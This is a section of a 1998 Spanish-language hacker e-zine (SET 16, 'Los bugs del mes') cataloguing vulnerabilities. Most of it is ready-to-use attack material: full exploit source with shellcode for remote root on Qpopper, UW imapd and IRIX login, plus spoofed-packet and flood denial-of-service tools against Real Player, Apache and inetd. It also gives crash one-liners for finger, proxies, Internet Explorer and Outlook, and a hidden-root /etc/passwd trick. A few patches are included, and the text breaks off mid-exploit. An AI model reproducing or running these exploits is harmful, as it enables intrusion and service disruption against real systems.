SET 39 Call For Papers

¿Eres un hacker? Si deseas pasar a formar parte de la historia del hacking hispano, colabora con la próxima edición de SET 39 enviándonos un artículo. No esperes más, esta es tu oportunidad de demostrar lo que sabes. Ayúdanos a construir una revista de hackers para hackers. SET Staff

SET 16

59734 visitas

Los bugs del mes

      2397

Autor: SET Staff
-[ 0x09 ]--------------------------------------------------------------------
-[ LOS BUGS DEL MES ]--------------------------------------------------------
-[ by SET Staff ]-----------------------------------------------------SET-16-

-( 0x01 )-
Para	 : Linux kernel
Tema	 : SUID root sin SUID root
Patch	 : Aqui mismito
Creditos : Michal Zalewski

<++> set_016/patches/linuxk
--- linux/kernel/sys.c.orig     Tue Apr  8 17:47:47 1997
+++ linux/kernel/sys.c          Fri Jun 19 16:00:28 1998
@@ -237,6 +237,8 @@
 {
        int old_rgid = current->gid;
        int old_egid = current->egid;
+
+       if (rgid>0xffff || egid>0xffff) return -EINVAL;

        if (rgid != (gid_t) -1) {
                if ((old_rgid == rgid) ||
@@ -272,6 +274,8 @@
 asmlinkage int sys_setgid(gid_t gid)
 {
        int old_egid = current->egid;
+
+       if (gid>0xffff) return -EINVAL;

        if (suser())
                current->gid = current->egid = current->sgid = current->fsgid = gid;
@@ -489,6 +493,8 @@
 asmlinkage int sys_setuid(uid_t uid)
 {
        int old_euid = current->euid;
+
+       if (uid>0xffff) return -EINVAL;

        if (suser())
                current->uid = current->euid = current->suid = current->fsuid = uid;
@@ -510,6 +516,8 @@
 asmlinkage int sys_setfsuid(uid_t uid)
 {
        int old_fsuid = current->fsuid;
+
+       if (uid>0xffff) return -EINVAL;

        if (uid == current->uid || uid == current->euid ||
            uid == current->suid || uid == current->fsuid || suser())
@@ -525,6 +533,8 @@
 asmlinkage int sys_setfsgid(gid_t gid)
 {
        int old_fsgid = current->fsgid;
+
+       if (gid>0xffff) return -EINVAL;

        if (gid == current->gid || gid == current->egid ||
            gid == current->sgid || gid == current->fsgid || suser())
@@ -563,6 +573,8 @@
 asmlinkage int sys_setpgid(pid_t pid, pid_t pgid)
 {
        struct task_struct * p;
+
+       if (pid>0xffff || pgid>0xffff) return -EINVAL;

        if (!pid)
                pid = current->pid;
<-->


Descripcion y Notas:

Un error en la definicion de algunas variables que intervienen en la
gestion del UID permite poseer una ID distinta de 0 y que para el sistema
sea eficazmente ID 0 (root).

El kernel almacena la ID en un word (2 bytes), lo que limita el ID al
rango entre 0 y 65535. Sin embargo, el tipo definido para el manejo de
UID y GID (uid_t) se declara como un entero sin signo, lo que le da la
posibilidad de manejar IDs por encima de 65535.

Por su parte, algunas llamadas al sistema, como sys_setuid(uid_t), truncan
el valor de la ID a 2 bytes.

De esta forma, si alteramos el fichero /etc/passwd de forma que nuestra ID
sea 131072 (10 00000000 00000000), nuestra ID eficaz sera 0, es decir, los
dos bytes menos significativos. Y como las utilidades para la deteccion de
intrusos en el fichero /etc/passwd buscan por ID 0, pasamos desapercibidos.

Tambien funciona en el caso de accesos restringidos desde el exterior. Es
habitual no permitir el acceso remoto con privilegios de root. Con nuestra
ID 131072, no tenemos privilegios, por lo que podemos acceder remotamente
sin problemas, pero para el kernel nuestra ID es la del root.


-( 0x02 )-
Para	 : Qpopper 2.4x
Tema	 : De todo un poco
Patch	 : Actualizacion
Creditos : Herbert Rosmanith

<++> set_016/exploits/qpush.c
/* qpush: qualcom popper buffer overflow exploit (pop_msg)
 * Mon Jun 29 01:26:06 GMT 1998 - herp
 *                                Herbert Rosmanith
 *                                herp@wildsau.idv.uni-linz.ac.at
 */

#include        <stdio.h>
#include        <sys/time.h>
#include        <sys/types.h>
#include        <netinet/in.h>
#include        <netdb.h>
#include        <signal.h>
#include        <unistd.h>
#include        <errno.h>

long addrlist[]={
        0xbfffeee4,             /*2.2*/
        0xbfffeb80              /*2.41beta1*/
};

char shellcode[] =
    "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
    "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
    "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
    "\xff\xff/bin/sh.........";

void die(char *s) {
        if (errno) perror(s);
        else fprintf(stderr,"%s\n",s);
        exit(-1);
}

void usage() {
        printf("qpush [-index] <hostname>\n"
               " -0 QPOP Version 2.2             (default)\n"
               " -1 QPOP Version 2.41beta1\n");
        exit(0);
}

int resolv(char *host,long *ipaddr) {
        if (isdigit(host[0])) {
                *ipaddr=inet_addr(host);
                if (*ipaddr==-1) return -1;
        }
        else {
                struct hostent *hp;
                if ((hp=gethostbyname(host))==NULL) {
                        fprintf(stderr,"tc: %s: unknown host\n");
                        exit(-1);
                }
                *ipaddr=*(unsigned long *)hp->h_addr;
        }
        return 0;
}

int connect_to(char *hostname,short port) {
struct sockaddr_in s_in;
int s;

        s=socket(PF_INET,SOCK_STREAM,0);
        if (s==-1) die("socket");

        if (resolv(hostname,(long *)&s_in.sin_addr.s_addr)==-1)
                die("unknown host");
        s_in.sin_family=AF_INET;
        s_in.sin_port=htons(port);

        if (connect(s,(struct sockaddr *)&s_in,sizeof(s_in))==-1)
                die("connect");

        return s;
}

void socket_read(int s,char *buf,int len) {
int i;
        switch(i=read(s,buf,len)) {
        case -1: die("unexpected EOF");
        case  0: die("EOF");
        default:
                buf[i]=0;
                //printf("%s",buf);
                break;
        }
}

void terminal(int s) {
char buf[1024];
fd_set rfds;
fd_set fds;
int i;

        for (i=0;i<NSIG;i++) signal(i,SIG_IGN);
        FD_ZERO(&fds);
        FD_SET(0,&fds);
        FD_SET(s,&fds);
        for (;;) {
                memcpy(&rfds,&fds,sizeof(fds));
                i=select(s+1,&rfds,NULL,NULL,NULL);
                if (i==-1) die("select");
                if (i==0) die("session closed");
                if (FD_ISSET(s,&rfds)) {
                        if ((i=read(s,buf,sizeof(buf)))<1)
                                die("session closed");
                        write(1,buf,i);
                }
                if (FD_ISSET(0,&rfds)) {
                        if ((i=read(0,buf,sizeof(buf)))<1)
                                die("session closed");
                        write(s,buf,i);
                }
        }
}

void main(int argc,char *argv[]) {
char buf[1024+128];
int s,i,ix;

        if (argc>=2 && argv[1][0]=='-') {
                ix=atoi(&argv[1][1]);
                argc--;
                argv++;
        }
        else ix=0;

        if (argc!=2 || ix>sizeof(addrlist)/sizeof(long))
                usage();

        s=connect_to(argv[1],110);      /* WKS POP3 */
        socket_read(s,buf,sizeof(buf));
        memset(buf,0x90,sizeof(buf));
        for (i=981;i<981+10*4;i+=4)
                memcpy(&buf[i],&addrlist[ix],4);
        memcpy(&buf[941],shellcode,strlen(shellcode));
        buf[sizeof(buf)-3]=0x0d;
        buf[sizeof(buf)-2]=0x0a;
        buf[sizeof(buf)-1]=0x00;
        write(s,buf,sizeof(buf));
        socket_read(s,buf,sizeof(buf));
        terminal(s);
}
<-->

Descripcion y Notas:

Menuda se ha montado este verano con el qpopper. Nadie se aclara. Por un
lado buffers overflow, por otro core dumps, y no pueden faltar cualquier
otro tipo de anomalias.

Pese a que el fallo original parece afectar a las implementacions en
diferentes sistemas operativos, el exploit que os dejamos solo funciona
para la version de Linux, excepto para la Debian con el QPop v2.2

Al final los de Qualcomm han sacado por fin una version nueva, aparentemente
sin el fallo que ha generado tanto revuelo. Para conseguirla:

    ftp://ftp.qualcomm.com/oldeudora/servers/unix/popper/qpopper2.5.tar.Z


-( 0x03 )-
Para	 : Linux 2.0.34 inetd
Tema	 : Matar el inetd
Patch	 : Kernel 2.0.35
Creditos : David Luyer

<++> set_016/exploits/inetdkill.c
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
  int s, p;

  if(argc != 2) {
    fputs("Please specify a pid to send signal to.\n", stderr);
    exit(0);
  } else {
    p = atoi(argv[1]);
  }
  fcntl(0,F_SETOWN,p);
  s = fcntl(0,F_GETFL,0);
  fcntl(0,F_SETFL,s|O_ASYNC);
  printf("Sending SIGIO - press enter.\n");
  getchar();
  fcntl(0,F_SETFL,s&~O_ASYNC);
  printf("SIGIO send attempted.\n");
  return 0;
}
<-->

Descripcion y Notas:

La ejecucion de este codigo en un Linux con el kernel 2.0.34, se tengan o no
privilegios, mata el demonio inetd.

En aquellos sistemas que no usen glibc, debe a¤adirse la linea:

#define O_ASYNC FASYNC


-( 0x04 )-
Para	 : Red Hat 4.2, 5.0 y 5.1
Tema	 : Programas con agujeros
Patch	 : Actualizarse
Creditos : twiztah

Descripcion y Notas:

Algunos de los binarios que se instalan con las distribuciones de Red Hat
que hemos mencionado presentan problemas de seguridad importantes, por lo
que se recomienda actualizarse a las nuevas versiones.

Los programas afectados son: bind, libtermcap, tin, slang, metamail, mailx,
dosemu y libtermcap.

Las actualizaciones (para la 5.1) las teneis disponibles en:

     ftp://ftp.redhat.com/updates/5.1/i386/metamail-2.7-17.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/mailx-8.1.1-3.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/bind-4.9.7-1.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/slang-0.99.38-7.i386.rpm
     ftp://ftp.redhat.com/updates/5.1/i386/tin-1.22-11.i386.rpm
     ftp://ftp.redhat.com/updates/5.0/i386/dosemu-0.66.7-7.i386.rpm
     ftp://ftp.redhat.com/updates/5.0/i386/libtermcap-2.0.8-9.i386.rpm

Los usuarios de las distribuciones 5.0 y 4.2 las encontrareis en:

     ftp://ftp.redhat.com/updates/5.0/i386/
     ftp://ftp.redhat.com/updates/4.2/i386/

Los nombres de los ficheros son los mismos, variando la version de la
actualizacion. Existen tambien actualizaciones para alpha y sparc en
los directorios correspondientes.


-( 0x05 )-
Para	 : Proxy en Windows 95
Tema	 : Cuelgue del proxy
Patch	 : Supongo que en las paginas oficiales
Creditos : Ryan Nichols

Descripcion y Notas:

Solo dos son los programas proxy afectados en esta ocasion: WinGate y
Startech. En ambos casos el procedimiento es similar.

Comenzamos haciendo un telnet al puerto pop3 del proxy. En el caso de ser
WinGate, teclearemos:

USER x#99999.....

Con todos los '9' que podamos.

De tratarse de Startech, tecleamos:

USER x<9999...>

De nuevo con todos los '9' posibles. El resultado es el mismo.


-( 0x06 )-
Para	 : Real Player 5
Tema	 : Cuelgue del real Player
Patch	 : En la ultima version
Creditos : Kit Knox

<++> set_016/exploits/rpkiller.c
/*
 * Real Player Killer - 6/26/98
 *
 * (C) 1998 Kit Knox <kit@connectnet.com>
 *
 * [ http://www.rootshell.com/ ]
 *
 * Real Player 5.0 for Windows95 and Linux (others untested) do not check
 * the validity of incoming UDP packets used when receiving audio/video.
 *
 * If you are able to determine or brute force the destination port of the
 * stream you are able to crash the player and cause it to use 100% of
 * idle CPU.  I would not be surprised if there are numerous buffer
 * overflows in this area as well.  The client does not even check if the
 * source IP address is the one it is receiving data from.  Any source IP
 * can be used.
 *
 * Generally the stack will start with port 1025 and go up.  Starting there
 * and going up will generally give you good results.  If you are able to
 * sniff the network you will know the exact port and not have to guess.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>

#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }

char real_data[] =
  { 0x00, 0x00 };


unsigned short
in_cksum (addr, len)
     u_short *addr;
     int len;
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;

  while (nleft > 1)
    {
      sum += *w++;
      nleft -= 2;
    }
  if (nleft == 1)
    {
      *(u_char *) (&answer) = *(u_char *) w;
      sum += answer;
    }

  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return (answer);
}

int
sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
     struct sockaddr_in *sin;
     unsigned short int s, datalen, sport, dport;
     unsigned long int saddr, daddr;
     char *data;
{
  struct iphdr ip;
  struct udphdr udp;
  static char packet[8192];
  char crashme[500];
  int i;

  ip.ihl = 5;
  ip.version = 4;
  ip.tos = rand () % 100;;
  ip.tot_len = htons (28 + datalen);
  ip.id = htons (31337 + (rand () % 100));
  ip.frag_off = 0;
  ip.ttl = 255;
  ip.protocol = IPPROTO_UDP;
  ip.check = 0;
  ip.saddr = saddr;
  ip.daddr = daddr;
  ip.check = in_cksum ((char *) &ip, sizeof (ip));
  udp.source = htons (sport);
  udp.dest = htons (dport);
  udp.len = htons (8 + datalen);
  udp.check = (short) 0;
  memcpy (packet, (char *) &ip, sizeof (ip));
  memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
  memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
  for (i = 0; i < 500; i++)
    crashme[i] = rand () % 255;
  memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
  return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
                  (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
}

unsigned int
lookup (host)
     char *host;
{
  unsigned int addr;
  struct hostent *he;

  addr = inet_addr (host);
  if (addr == -1)
    {
      he = gethostbyname (host);
      if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
        return 0;

      bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
    }
  return (addr);
}

void
main (argc, argv)
     int argc;
     char **argv;
{
  unsigned int saddr, daddr;
  struct sockaddr_in sin;
  int s, i;

  if (argc != 5)
    errs ("Usage: %s <source_addr> <dest_addr> <low port> <high port>\n", argv[0]);

  printf("Real Player Killer - http://www.rootshell.com/\n\n");
  if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
    err ("Unable to open raw socket.\n");
  if (!(saddr = lookup (argv[1])))
    err ("Unable to lookup source address.\n");
  if (!(daddr = lookup (argv[2])))
    err ("Unable to lookup destination address.\n");
  sin.sin_family = AF_INET;
  sin.sin_port = 9;
  sin.sin_addr.s_addr = daddr;
  for (i=atoi(argv[3]); i<atoi(argv[4]); i++)
  if ((sendpkt_udp (&sin, s, &real_data, sizeof (real_data), saddr, daddr, 2014, i)) == -1)
    {
      perror ("sendpkt_udp");
      err ("Error sending the UDP packet.\n");
    }
  printf("Done!\n");
}
<-->


-( 0x07 )-
Para	 : SlackWare 3.4 /bin/login
Tema	 : Acceso modo root
Patch	 : /etc/groups
Creditos : Richard Thomas

Descripcion y Notas:

Cada vez nos lo ponen mas simple.

En esta ocasion, si accedemos a un SlackWare que no tiene el fichero
/etc/groups directamente conseguimos UID 0 GID 0... root access granted ;)


-( 0x08 )-
Para	 : IRIX 6.3 y 6.4
Tema	 : Sobrecarga del procesador
Patch 	 : Uhmmm!
Creditos : Matthew Potter

Descripcion y Notas:

Tan simple como ejecutar:

finger -l @@@@@@@@@@@@@@@@@@@@@destino@bounce_host

donde debe haber unas 500 @

Entonces la maquina destino sufre una sobrecarga de procesos importante.


-( 0x09 )-
Para	 : UW impad (Pine 4.0)
Tema	 : Root access entre otras cosas
Patch	 : Aqui y en la UW
Creditos : Cheez Whiz

<++> set_016/exploits/imappy.c
/**
***  i386 BSD remote root exploit for UW imapd IMAP 4.1 server
***
***  This is *not* the same bug addressed in CERT Advisory CA-97.09!
***
***  Usage:  % (imappy nop esp offset; cat) | nc hostname 143
***
***  where nop is the number of NOP opcodes to place at the start of the
***  exploit buffer (I use 403), esp is the %esp stack pointer value, and
***  offset is the number of bytes to add to esp to calculate your target
***  %eip.
***
***  Demonstration values for UW imapd 10.234 (part of Pine 4.00):
***
***      imappy 403 0xefbfd5e8 100    (BSDI 3.0)
***      imappy 403 0xefbfd4b8 100    (FreeBSD 2.2.5)
***
***  THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER
***
***  Cheez Whiz
***  cheezbeast@hotmail.com
***
***  July 16, 1998
**/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN (2*1024)
#define NOP 0x90

char shell[] =
/*  0 */ "\xeb\x34"                      /* jmp springboard              */
/* start:                                                                */
/*  2 */ "\x5e"                          /* popl %esi                    */
/*  3 */ "\x8d\x1e"                      /* leal (%esi),%ebx             */
/*  5 */ "\x89\x5e\x0b"                  /* movl %ebx,0xb(%esi)          */
/*  8 */ "\x31\xd2"                      /* xorl %edx,%edx               */
/* 10 */ "\x89\x56\x07"                  /* movl %edx,0x7(%esi)          */
/* 13 */ "\x89\x56\x0f"                  /* movl %edx,0xf(%esi)          */
/* 16 */ "\x89\x56\x14"                  /* movl %edx,0x14(%esi)         */
/* 19 */ "\x88\x56\x19"                  /* movb %dl,0x19(%esi)          */
/* 22 */ "\x31\xc0"                      /* xorl %eax,%eax               */
/* 24 */ "\xb0\x7f"                      /* movb $0x7f,%al               */
/* 26 */ "\x20\x46\x01"                  /* andb %al,0x1(%esi)           */
/* 29 */ "\x20\x46\x02"                  /* andb %al,0x2(%esi)           */
/* 32 */ "\x20\x46\x03"                  /* andb %al,0x3(%esi)           */
/* 35 */ "\x20\x46\x05"                  /* andb %al,0x5(%esi)           */
/* 38 */ "\x20\x46\x06"                  /* andb %al,0x6(%esi)           */
/* 41 */ "\xb0\x3b"                      /* movb $0x3b,%al               */
/* 43 */ "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx          */
/* 46 */ "\x89\xca"                      /* movl %ecx,%edx               */
/* 48 */ "\x52"                          /* pushl %edx                   */
/* 49 */ "\x51"                          /* pushl %ecx                   */
/* 50 */ "\x53"                          /* pushl %ebx                   */
/* 51 */ "\x50"                          /* pushl %eax                   */
/* 52 */ "\xeb\x18"                      /* jmp exec                     */
/* springboard:                                                          */
/* 54 */ "\xe8\xc7\xff\xff\xff"          /* call start                   */
/* data:                                                                 */
/* 59 */ "\x2f\xe2\xe9\xee\x2f\xf3\xe8"  /* DATA (disguised /bin/sh)     */
/* 66 */ "\x01\x01\x01\x01"              /* DATA                         */
/* 70 */ "\x02\x02\x02\x02"              /* DATA                         */
/* 74 */ "\x03\x03\x03\x03"              /* DATA                         */
/* exec:                                                                 */
/* 78 */ "\x9a\x04\x04\x04\x04\x07\x04"; /* lcall 0x7,0x0                */

char buf[BUFLEN];
unsigned long int nop, esp;
long int offset;

void
main (int argc, char *argv[])
{
    int i;

    if (argc < 4) {
        printf("usage: %s nop esp offset\n", argv[0]);
        return;
    }

    nop = strtoul(argv[1], NULL, 0);
    esp = strtoul(argv[2], NULL, 0);
    offset = strtol(argv[3], NULL, 0);

    memset(buf, NOP, BUFLEN);
    memcpy(buf+nop, shell, strlen(shell));
    for (i = nop+strlen(shell); i < BUFLEN - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;

    printf("* AUTHENTICATE {%d}\r\n", BUFLEN);
    for (i = 0; i < BUFLEN; i++)
        putchar(buf[i]);
    printf("\r\n");

    return;
}
<-->

Descripcion y Notas:

Un error en la implementacion del imapd que se distribuye conjuntamente al
Pine 4.0, permite, entre otras cosas, conseguir accesos no autorizados de
forma remota.

El parche lo distribuye la Universidad de Washington, con la numeracion
10234, como el original. De todas formas, basta con cambiar el codigo de la
funcion mail_auth() de mail.c que se distribuye por el siguiente para evitar
el problema

<++> set_016/patches/imapd.c
char *mail_auth (char *mechanism,authresponse_t resp,int argc,char *argv[])
{
  char tmp[MAILTMPLEN];
  AUTHENTICATOR *auth;
                                /* cretins still haven't given up */
  if (strlen (mechanism) >= MAILTMPLEN)
    syslog (LOG_ALERT|LOG_AUTH,"System break-in attempt, host=%.80s",
            tcp_clienthost ());
  else {                        /* make upper case copy of mechanism name */
    ucase (strcpy (tmp,mechanism));
    for (auth = mailauthenticators; auth; auth = auth->next)
      if (auth->server && !strcmp (auth->name,tmp))
        return (*auth->server) (resp,argc,argv);
  }
  return NIL;                   /* no authenticator found */
}
<-->

Si lo preferis, podeis obtener la version ya parcheada en:

		ftp://ftp.cac.washington.edu/mail/imap.tar.Z


-( 0x0A )-
Para	 : who
Tema	 : Lo que se os ocurra
Patch	 : A ver, a ver...
Creditos : Paul Boehm

Descripcion y Notas:

En algunos sistemas, who se encuentra en el grupo de los programas
privilegiados, que, por ejemplo, pueden leer el utmp.

Ejecutando who con algunos truquitos, podemos hacer casi de todo.

Por ejemplo, en RedHat 5.1 ejecutar who /bin/bash el sistema se cuelga.
En FreeBSD puede usarse para ver ficheros pertenecientes al mismo grupo que
who, de la forma who /fichero


-( 0x0B )-
Para	 : PovRay 3.02
Tema	 : Acceso root
Patch	 : Ya veremos
Creditos : Luke

Descripcion y Notas:

Al instalar el PovRay 3.02 para linux, la libreria s-povray tiene que
tener suid root para poder ejecutarse sin problemas (acceso a /dev/console).

El problema surge cuando desde la shell damos un nombre de fichero largo,
resultando en un segmentation fault.

Ejemplo:

[root@hazard root]# s-povray -I`perl -e "print 'A'x1000"`


-( 0x0C )-
Para	 : Internet Explorer 4.0
Tema	 : System Crash entre otros
Patch	 : Mozilla rulez !!!
Creditos : Varios

Descripcion y notas:

Por una parte, tenemos que si incluimos la etiqueta <OBJECT> en una pagina
HTML y la cargamos con el Explorer, podemos hacer desde que el explorer
se cierre hasta llegar al pantallazo azul.
Pero para ello, la etiqueta debe llevar algo especial. Veamos:

<OBJECT CLASSID=---mas de 250 caracteres----></OBJECT>

Segun como le de al sistema, pasara una cosa u otra.

Tambien tenemos el siguiente codigo:

<++> set_016/exploits/ie4.html
<HTML>
<title>Adios IE 4.0</title>
<OBJECT CLASSID=#></OBJECT>
</HTML>
<-->


-( 0x0D )-
Para	 : Microsoft Outlook
Tema	 : Overflow
Patch	 : Microsoft?!?!?! LINUX !!!!
Creditos : Ryan Veety

Descripcion y Notas:

Un mensaje que contenga:

MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="204-1969819122-901726347=:19806"

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII

test

--204-1969819122-901726347=:19806
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Don't read this text file
--204-1969819122-901726347=:19806--

Cuelga el Outlook, dando un error en la direccion 0x41414141 (AAAA)


-( 0x0E )-
Para	 : Apache
Tema	 : Crash
Patch	 : http://www.apache.org
Creditos : Dag-Erling Coidan Smirgrav

<++> /set_016/exploits/sioux.c
/*-
 * Copyright (c) 1998 Dag-Erling Coidan Smirgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software withough specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

#include <sys/types.h>

#include <sys/socket.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void
usage(void)
{
    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
    exit(1);
}

int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }

    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);

    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }

    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");

    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }

    fclose(f);
    exit(0);
}
<-->


-( 0x0F )-
Para	 : Irix 6.3
Tema	 : root access
Patch	 : Donde siempre... SGI lo tiene, y nosotros tambien
Creditos : David Hedley

<++> set_016/exploits/login.c
/* /bin/login exploit by DCRH 24/5/97
 *
 * Tested on:   R3000 Indigo (Irix 5.3)
 *              R4400 Indy (Irix 5.3)
 *              R5000 O2 (Irix 6.3)
 *              R8000 Power Challenge (Irix 6.2)
 *
 * Compile as: cc -n32 login.c     (for Irix 6.x)
 *             cc login.c          (for Irix 5.x)
 *
 * Press enter when prompted for a password
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      200
#define EXTRA           300
#define OFFSET          0x1b0
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned


u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */
};

u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
